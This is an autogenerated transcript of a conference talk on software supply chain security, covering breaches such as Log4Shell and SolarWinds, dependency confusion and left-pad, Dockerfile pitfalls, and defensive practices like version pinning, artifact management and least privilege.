Transcript
This transcript was autogenerated. To make changes, submit a PR.
Hi, welcome to addressing security concerns in every stage of
the software supply chain. My name is Melissa McKay. I'm a developer advocate
at JFrog and just some quick background on me. Me,
for the past well over 20 years now, primarily I've been a
developer all the way from a lowly intern to a principal engineer. And the
last few years of my career as a developer advocate,
I've been going to conferences, talking and sharing about these experiences.
A lot of this talk will be that. Exactly. Just things that I
found over the course of my time as a developer.
My contact information is here if you have any questions, and I'll share that with
you again at those end. So one of the things that I've been able
to do as a developer advocate is have a lot of interactions with other people,
other people that work at other places, deal with lots of
different things. And one gentleman I had the pleasure of meeting and working with was
Damien Curry. He is the business development technical
director at F five and with Nginx originally.
And with him we decided to
get together and just kind of explain the journey of an application.
Basically what we wanted to talk about was a
series of just going through each of the stages that you plan
for and discuss as you're running through all of this,
necessary steps that you need to take to get an application,
all the way from just the very beginnings of development all the way into production.
And we have a list of episodes that we've created,
each of them varying time, maybe 30 45 minutes each.
And the one that was really interesting was the one where we considered
security. This talk I'll be focusing more on during
those episode or in this talk. It was really interesting to
get a developer's perspective myself, as well as an
ops perspective on those, which was more in Damien's
field. So I don't know how many of you have seen this.
This is just a typical default web server
page. And way back this was my very first experience
even thinking about security during my
time in school and when I was learning in the very beginning as a
junior, it just didn't cross my mind how many things we need
to be concerned with in addition to just writing good code.
But there's other things about our environments that we really need to pay attention to
as developers. And one thing that was introduced
to me was security through obsofuscation.
I didn't even say that word correctly. And this was
funny because we can go on and on about
whether this is a good strategy or not. It was my first experience
touching on security at all. So basically, my first step was to
go through and make sure that this default page didn't show up because we
didn't really want to reveal what version of Apache we were using,
just in case someone had any clever ideas of attacking that particular
version. So obviously,
lots of reasons to be concerned with security.
All over the news we hear about theft of private customer and
or company data. I just got a letter in the mail,
as probably a lot of you have gotten from various
banking places and other places
that use my credit, things like that. So lots of reasons and lots
of money in this business. Talking about that, the loss of
money for an organization, if they're not taking their security seriously or
they suffer from some intrusion,
there can be a loss of money not only on their side, but on their
customer side, and also loss of credibility. We can all agree that
downtime as well, for any reason, is a problem in your production environment.
So yet another reason to be concerned with security issues.
I'm just going to whip through some famous hacks. This one, probably most of
you are familiar with those equifax data breach.
This happened march through July of 2017,
and there was a lot of money involved in this.
1.4 billion in cleanup costs, estimated 1.38
billion in consumer claims, and 143,000,000 customers
were affected. For those of you familiar with this, this was an Apache
struts vulnerability. Unfortunately for this company, this was a
vulnerability that was known, but just wasn't patched in time
before something happened. What happens,
in a nutshell on this one, this next one log for shell,
is that one chain trigger a remote code execution by providing a
string in a certain format that ends up being logged. And that turns
out that that opens up the ability to initiate an LDAP lookup,
fetch some compiled code, and execute it. And just about every Java
developer out there cringed their way through. Fixing this vulnerability
took a lot of time, lots of money as well.
When we're talking about money, we're not talking about just claims. We're talking about the
time that developers need to spend and ops need to spend fixing these
problems. Stephen Miguel,
the vice president of product innovation at Sonotype, he estimated
that approximately 70,000 open source projects use
log for j as a direct dependency and 174,000
projects use it as a transitive dependencies.
That means a dependency of a dependency. All right,
here's another one. This is just interesting to me. I just
went looking just to see what the most recent attacks were. We hear
this stuff in the news all of the time, kind of addressing a lot
of those have to do with data breaches, and this website attracts
the latest data breaches.
It's of course a huge motivator for hackers due to its immense value,
and there's several of those each month, and there's already
some new ones that have come out, but there were a few
that really caught my attention, mainly because of the commonality
of the move it hack between all of these. So in
June 1, 2023, the move it hack
affected zealous British Airways,
BBC, and others. It's a popular file transfer tool.
Again, in July 20, it reared its ugly head.
There was a poker stars data breach. This is the world's largest
online poker platform, and it suffered this data breach which exposed the
information of 110,000 customers.
The attackers, they exploited that move it zero day
vulnerability to gain access to the poker site systems,
and they're no longer using the move it transfer application.
But there was a lot of data stolen in the meantime,
unfortunately last 1 August 11,
that I'll just point out also in 2023,
this is the IBM move it data breach. There were 4.1 million
patients in Colorado that had sensitive healthcare data stolen
during another that exploited that same vulnerability. In those move
it transfer software, the systems affected were
managed by large companies like IBM, so this was
serious business. There's a featured article on TechCrunch
that was put out on August 25, described the moveit hack
as the biggest hack of the year by the numbers. It's an interesting
one to check out. Included a QR code here for you if you want
to go read that yourself. The global average
cost of a data breach was $4.45
million in 2023. That's a 15%
increase over three years. This is serious business, so we
do need to sit back and figure out what we can do to
help mitigate these problems. And as a developer,
it does sound reasonable to say that if you're developing software,
you're writing software, it is your responsibility to write code
that is secure. This is absolutely true.
But as we talk a little bit further about this,
there's something that you need to understand. It's not all about the code
that's written itself. So just for fun,
I discovered this essay,
how to write insecure code. For those of you that like sarcasm,
you'll really enjoy this one. There's quite a few
third party organizations that can be hired by corporations
to train their developers internally, and I'd highly recommend that
approach. But if you're on your own learning these things, this is a really good
research for you even just this essay itself, even though it's kind of
a joke, there's some things in here that are really good to point
out and lots of detailed information on how to protect your systems,
how to protect your container images,
for example, the environments that they're running in. It's pretty
amazing. And OASP, the open web application security project,
that's where this essay is. That's the resource that has a lot of
this information for free. So there's a lot of opportunity for you
to go out and learn on your own.
Some of the things that were included in this essay I thought were important to
point out. Always using default. Deny.
This is kind of silly. Denying that your code can't ever
be broken. Deny unless there's
something that can be proven that it's actually broken. Just pretend that
everything's fine. Secure languages who
writes in secure languages? I think we all have a tendency to
adore the language that we were brought up with. My background is in Java.
I enjoy writing a lot of Java. That's basically where I'm
most familiar. But we all know that all of our languages have pros
and cons, and there are some things that we need to pay attention to that,
some weaknesses that we need to learn.
Mixing different languages. This is kind of funny being a
Java developer. It's important to point out that these days,
rarely are you going to find a Java developer where all they program is in
Java. There's lots of other languages that you need to learn in
order to get things like web apps out there, be able to
write scripts in shell,
things like that, lots of python these days there's
a lot of opportunities to learn and work with other languages as well.
And one of the jokes in this essay is that if you mix as many
as possible, you'll be fine. They all have different security
rules, so it'll be difficult to break into any of them.
Pretty silly idea. A few more before I just let you
go. Read the rest on your own. Relying on security checks done elsewhere.
This is a big one for developers, right? Because we often were
on teams. If you're in a larger company, you may be on a team that
has a whole nother separate security team that is dealing with a lot
of these issues. So it's easy to kind of sit back and think
that, oh, well, that's already being taken care of by someone else, so I don't
really need to think about it. Obviously, learning about a security
problem much later in the development process is a lot more expensive and difficult
to mitigate than dealing with it or preventing it up
from in front of the developer. So anything that
we can do to help this process is valuable,
and we do need to learn what is in our
developers toolbox to help us prevent some of these things from happening.
On trusting insiders malicious input only
comes from the Internet. You can trust that all data in your databases is
perfectly validated, encoded and sanitized for your purposes. Anyone who's
been dealing with, especially if you switch back and forth between a
production or a test system, you know that there's opportunity sometimes
if you're allowed too many permissions, or maybe the systems aren't set up in such
a way to prevent accidents. Obviously you
can get problems from within. It doesn't always come externally
and then code wants to be free. This last one, dropping your source code into
repositories that are accessible by all within the company,
especially back when I was a junior, I used to want to have access to
everything. I wanted to see everything, mainly just because I was curious.
But oftentimes that's not the best. It's for your own protection
to only have access to what you actually need to have access to.
Being able to update a repository
or make changes to code that maybe isn't even in
your project, not a real safe way to operate.
And we have to remember a lot of times errors
happen or issues happen, that it
wasn't on purpose, it wasn't malicious intent, it could have been just
an accident. So we have permissions to kind
of give us comes guardrails to prevent things like that from happening.
So educating developers is really important. I talked about this,
and I was lucky enough to be involved with an organization that did have
one of these third party organizations that was hired
to train us a little bit. And depending on your particular language,
that was your focus. You had some specialized activities to
learn about all of these things. We had learned about what SQL injection was,
what cross site request forgery was, what LDAP injection was,
how to prevent these things. And after taking those
courses, I really thought I knew my stuff. I thought,
well, I'm going to write the most secure code ever. This is all
I really need. And as long as I do that, everything's going to
be fine. What I didn't understand at that time
and quickly learned thereafter is even though I was
confident in writing strong code myself, it turns out there's so
much open source code that we use.
Part of being a responsible developer is to not
continuously reinvent the wheel if it's not required.
Being able to go out there and find resources that you can build off of
is going to help you get your applications out to production faster,
deal with issues faster. If you have
these frameworks that work really well for you, you're going to be able to just
develop your applications more efficiently. So it turns
out there is a ton of code that you may not have ever
written and may never look at and don't know much
about, other than they are just the building blocks that you're building on
top of. So it turns out there's a lot of code, like this
iceberg picture that is pulled in during your build
that you've never touched or looked at before. And when
I was working with Damien on our
series, there was a little project we were working on. There was
a number of different components,
and I just did a maven tree just to
look and see what all of the dependencies were. And it turns out, just in
single component that we were looking at, there were 114 direct
and indirect dependencies, and they went seven layers deep.
So dependencies of dependencies of dependencies. And these were all just brought
in as I was doing a build from Maven Central.
And again, that entire application consisted of seven microservices.
So this is multiplied by seven.
There are a lot of security reports out there that you
can take a look at. This one is particularly interesting, open source security
and risk analysis report. In this 1117
o, three commercial code bases across 17
different industries were scanned. And one thing,
when you're reading reports like this, always look at the methodology.
This number is kind of buried in the report just to give you an idea
of where this information is actually coming from. And I'm always impressed when
that is upfront for you to see. This one was,
and they have a number of different graphs of the different industries. I liked how
they categorized all of these things, because sometimes when we work
in a silo, we don't realize all of the code that's being written everywhere
in every industry. These three were pretty important.
I just took these three graphs directly from the
section on the use of open source and the three industries
that I thought were most interesting.
Also interesting. And maybe this can be a
fun talk with your colleagues or whatever, is why there's such a peak in
2020. I chain only imagine maybe
the peak in vulnerabilities. I don't know if they're just more being
discovered in 2020 or more being introduced.
You can go round and round with your colleagues on that one.
If every developer that writes code,
writes secure code and doesn't make mistakes,
then we shouldn't have any of these problems, right? And is it
really all up to developers? And I think you already know the answer to that.
There is a lot that we can do, but there's actually a lot
that we aren't involved with, like the code that we've written.
It doesn't matter how well we've written it, there's still some issues we
need to be aware of. This is a perfect example of it.
Solar winds. So this involved 18,000
customers that received an update that included malicious code with a backdoor.
And basically 4000
lines of code was written to the Orion platform DLL.
But it was done after compilation, which suggests that
the binary may have been switched in the CI system
internally. And what made this foolproof is the fact that
that file was even digitally signed. So it's
possible that attackers had access to the SolarWinds software development or
the distribution pipeline. So after the code
is written and sent off to be built and then
to be delivered, something happened in there. So it's just way
more complicated than just developers themselves writing secure
code. This is a corporate slide that I see often in
decks within JFrog. And this just kind of gives you a view
of the world of all of the environments that we work with,
all of these components that we put together when we build our software.
And you can see the whole process here of a developer
initially writing code, pulling in packages and libraries
from remote repositories or public repositories,
going all the way through building it on your CI servers, whichever tool you choose
to use. And I just want to highlight all of these red arrows
everywhere where we refer
to artifacts and dependencies. There's a
lot of places in here that are weak points that
if an attacker has access to, they can interrupt this flow
and basically cause you to put out
a vulnerability into production. One organization
that has been helping define all of
these areas where there can be issues is the supply chain levels for software
artifacts. Salsa. This is basically
an attempt to measure an organization's progress and to help give
them goals to improve. Just to kind of give you a
baseline to start with and give you ideas on
what different areas of your software development
process you can improve. So between
your source code and the delivery of your product, or the
deployment of your service, there are places you really do need to take extra care
to protect your supply chain. And each one of these red triangles
represents an opportunity for an attacker to disrupt.
So let's talk about a few more examples of things that developers
need to be aware of that we can have some control over,
and one of these is called a dependency confusion attack. This was
described by Alex Burson in a blog post on medium a couple of years ago.
It turns out that most projects have a collection of dependencies,
and they include open source or publicly available packages
as well as internal packages. And this example, the highlighted
yellow, are internal package names.
Note that the version requirements for these are just
that, the version is either the one specified or greater.
Those package names when you build are not secret either.
It turns out that NPM requests inform about internal
package names. So what exactly is the problem here?
Well, let's take a look at what it means. In the diagram,
a request is made for a corporate library, an internally built
library, something that may be proprietary and
it's expected to come from some internal repository.
But what happens instead is that the package manager
sees that there's a greater version available publicly, and it will pull
that one instead. So who knows what's in that package?
Havoc ensues. You'll find out pretty quick, probably.
Or if it's something maybe not,
maybe you won't find out pretty quick. It could be something running in the background
that you don't see right away. But one way to protect yourself from
a scenario like that is to control your requests for internal packages.
And using an artifact management system, you can specify
internal package requests to only be resolved with internal repositories.
It's important to remember to do this because this isn't the default
setup, right? By default, you pretty much have access to anything.
I don't know. Depending on how your organization works, you may be
in a position where you don't have access to the Internet other
than through proxies provided by your employer.
You may be behind a firewall of some sort, but most of the time,
especially when you're developing pet projects at comes or in any other
environments, you're going to be pulling directly from public repositories.
So it's important to understand that that's what's happening and the
default behavior of your build
software so that you know exactly what
you're pulling in, where it is coming from. This particular attack
$130,000.
Alex did a really good job of employing
himself with these bug bounties. There's quite a few details
that he discusses in his article that I didn't talk about, so here's another QR
code for you to read his original article about those.
All right, here's another fun one. Managing open source dependencies. I think
many of you, if you like Xkcd it's one of my
favorite cartoons. You probably have seen this one. The problem has
more to do with managing open source packages and libraries themselves. Not really
about a malicious package or a vulnerable package.
It just illustrates a trap that we fall into when we solely rely on
public repositories for our builds, things that other people have written.
And the best example of where those problem rears
its head is the leftpad incident.
Basically, a developer had an NPM package out
there named Kick, and it was just a pet
project that helped developers set up templates for their projects. It wasn't really
widely known, but there was also a kick organization.
It was a chat app and they owned the domain kick.
So they had trouble with this kick package being out
there in NPM because it just seemed like when someone wanted to pull
in kick, they were expecting to get something associated with Kick.
Also, Kick had a registered trademark on the.
You know, there were some issues. Those they contacted, those developer
tried to come to an agreement. They were not able to come to an agreement.
So NPM came in. And because
of that policy of making sure that users get
a package that they expect in order to eliminate
typo, squatting, that kind of thing, they sided with
the kick organization. And under that policy,
usually what happens is the existing package with the
disputed name, it stays where it is, it remains
on the NPM registry, but the new owner of that
name publishes their package with a breaking version
number. So that's what happened.
But unfortunately, the developer
unpublished his package and
along with that, 272 other packages
that he wrote. So obviously he was pretty miffed about the decision,
did not support that at all. And one of those packages was
left pad. This is a pretty big deal because it turned out that a lot
of software out there relied on Leftpad,
not even directly, but as a transitive dependency.
So things were broken right away. There was a developer who stepped
in, Cameron Westland, who published
in order to help with this problem, he published an identical version of
the package, labeled it as version 10.
But many of those pieces of software that relied on it
originally were following best practices and they were explicitly requesting
version zero, zero, three. So it was still a big problem.
People had to figure out exactly where in the code that they were relying
on this and make sure they were getting the right package. Now, the most interesting
thing about that story is this is it. These are the
lines of code that were an issue and caused
so much trouble. And if any of you know, deal or work in JavaScript,
you might be familiar with React. React was broken because of this
that's widely used and created by Facebook and used
by Facebook. And many of these projects actually relied
on kick as a transitive dependency. So just a
tiny little piece of code. And such a big problem when it
got removed from a public repository. Now here's another one.
I am a docker captain,
so I deal a lot with containers, but I
do remember back when I was first learning how containers are built
and combing through Docker files. There were a lot of issues that
I didn't understand. I didn't know what was going on under the covers.
And this file, this is very contrived file, but something
you might find when you're looking for examples of how to write a Docker
file. And there's just a couple of things that I'm going to point out here.
I won't go through everything, but just a couple. So the first line, first of
all, a lot of docker images rely on
base images. Where are these base images coming from? Think about that.
They by default are coming from Docker hub unless you are explicitly
asking for it from another registry. So make sure you understand
where your base images are coming from. There's a lot out there.
There's a lot that
are trusted, that are well maintained, so make
sure that you're using those. Also, there's no tag or
Shaw identifier. So I would argue that even a tag isn't enough to
actually pin an exact version because it's more of a pointer than
anything. It can be overwritten, a tag itself can be overwritten,
and you might get something completely different than what you were expecting.
We see this a lot with when you rely on latest, you'll get the latest
of the image. Sometimes that's appropriate, like if
you're in an R and D environment or something, you always want to get the
latest build. But in other times in production,
I wouldn't rely on latest. I would pin that version down to make
sure you don't get any surprises. All right, another one.
Lines two through four. So these are packages that are updating
packages in the base image. And you can see some
don't have line three. There's no
version number at all. Line four is a particularly old
version. It could be bad. It could have a vulnerability in it.
I see people discover this most often when a new
developer joins the team and they are building this from scratch on
their fresh environment. They don't have the
advantages of having a full cache already. And so they might come into
a lot of different problems where some of these packages are coming in that are
not the same as what everyone else has.
So good to pin those versions down. What else next?
Oh, line seven. So, referring to external
resources, this is just a curl script. There was a situation
I once had where our team needed
a proprietary piece of software installed, and so we
did exactly this. We got those shell script that was provided
by the company, brought it in, ran it. Well,
what happened was it worked fine for
a while, but then that company decided to move it or change it.
The first thing that happened was it was changed to an incompatible version. Well,
obviously that wasn't going to work for us. Next it moved to
a completely different location. So each of those times we had broken builds and
we had to figure out what it was. So rather than rely on an external
resource like this, the best thing you can do is to bring it in to
your internal environment and manage it there. Make sure that updates you
have control of when it's updated or when it's moved, rather than trying
to coordinate with an external source like that.
Lastly, number nine, images running as a root.
This is big. I feel bad sometimes
about saying that. It seems like an obvious thing now, it's talked about a lot
not to run images of root, always make sure that you
pay attention to obeying
that policy of least privilege. But even
in 2022, cystic puts out this report every year.
This cloud native security and usage report, they discovered that out
of 3 million containers they were observing, 76% of them were run
as root. Now sometimes that's legitimate,
but the important thing to know here is make sure you know
why you're running as root. If you're just doing it by default, probably not
a good situation to be in. I'm going to hammer on this a little more
because there's a more recent report that just came out and we're not getting better
at this, we're getting worse. There's now 83%. This was out
of 7 million containers that were being observed, 83% of
these containers were running as root. So lots of problems.
Is there any hope? Let's talk about some solutions, some things that we
can put in actual actionable
items where we can improve our situation here.
First thing, educate ourselves. I'm going to hammer on
this a lot. I know that developers are already,
we have a full plate, there's already a lot that we need to know.
But as developers, we also understand that this is a career where you're constantly learning,
things are constantly changing, you constantly need to keep up. So adding
things to your toolbox, around security, extremely important.
No one is ever going to know everything at
first. So it's important to have a combination of teams where you have more senior
folks on the team as well as juniors.
It can be very difficult if all you have are juniors on your team.
We really do need to work on mentorship and making sure that we're
guiding the next generation up so that we don't fall
into the same old traps over and over again. Some ideas
for education I brought this up earlier in the talk. OWAsp resources.
They have some cheat sheets out there on their website. There's a QR code for
you here. All kinds of stuff that
you can learn. All the things I mentioned earlier that
I learned through a third party, things like cross site scripting, SQL injection,
they go through all of these things. Very detailed section
on containers too, and environments for those. So always
very good references here for developers
to take advantage of. Another one. The OpensSF
organization has a trio of free courses.
These three are part of the secure software development fundamentals
professional certificate program. So if you pay some money,
you can actually get a certificate for taking these courses, but they also provide
them for you to audit. You can audit these for free.
All of them are available on those EDX platform.
So another easy resource for you to take advantage of.
All right, I'm going to go through the rest of these pretty quickly. Don't rely
solely on public repos. Remember the left pad incident that I talked about?
That's one reason I'm not going to say public repos are
bad to use. Obviously they're valuable. You need them to get the initial packages
that you need, right? And that's our location for where developers
can share open source software. Just make sure that you save every artifact
that you need for your builds in a local artifact management
system, something that you have control over, that you can manage and
take inventory on. And there's
lots of tools out there. Obviously, my employer is JFrog. I could recommend artifactory,
but there are other tools available out there that you can start with that
are open source. Even. The important point here is just to have one.
Make sure that you're keeping track of your dependencies so that you don't have broken
builds for unknown reasons. All right, manage your dependencies
again, I recommend an artifact management system.
Any, just have one. But make sure that you specify explicit
versions in your software so you know exactly what packages that you
are getting. And in the cases of docker images using
a Shaw, some of your NPM packages using a Shaw
is appropriate. So make sure that you're doing this.
Manage permissions so important. This is
probably more controlled under an ops environment,
but developers need to pay attention to this. Two, they need to enforce
least privilege access. That requires
an understanding of which permissions are actually needed that
are actually going to be in use. And that brings me to the latest sysdig
report as well. They pointed out that 90% of granted permissions
are not even used. This is dangerous. It can set yourself up for
not only malicious activity, but it can set yourself up for some serious accidents.
Not a good thing to go through, especially as a junior developer if you
accidentally wipe out your production database, for example. So these are things that
we need to be paying attention to. Okay? Managing your
dependencies, your permissions. That's not enough. You need to regularly scan your libraries
and packages. It's not a one and done thing to say, oh, I brought in
this package. It's good. I've got it stored locally. This is what I'm going to
use forever and ever. Things come out all of the time.
New vulnerabilities are discovered all of the time. So it's important
to stay up with the latest. Make sure that you're regularly scanning them
so that you discover them to begin with and have a
process where your developers can fix those issues and
that involves keeping up with maintenance. So not
only your packages need to be updated periodically, reviewed periodically,
but your systems, the environments that your software
runs in. They also need to be updated regularly.
Don't let things get stale. And lastly, make sure you
have a plan in place for when it comes time to dealing with a security
threat in production. Because it will happen. It will. It's important to
have a plan that makes sense where you can efficiently and quickly
mitigate the problems so you don't have a huge delay between discovering
a vulnerability and then mitigating it with a patch. So having
those automated systems in place, having CI in place,
having automatic scanning in place, and then also being able to
deploy a new version, making sure that that process is
as clean as possible. So that's all I have
for you. If you have any questions, feel free to reach out for me,
both on Twitter or LinkedIn. I'm available in both places.
And just remember that there's always something new to be learned as
a developer. We all go through that process and these are
just more tools and more awareness in your toolbox
as a developer to make your projects
more secure. Thank you.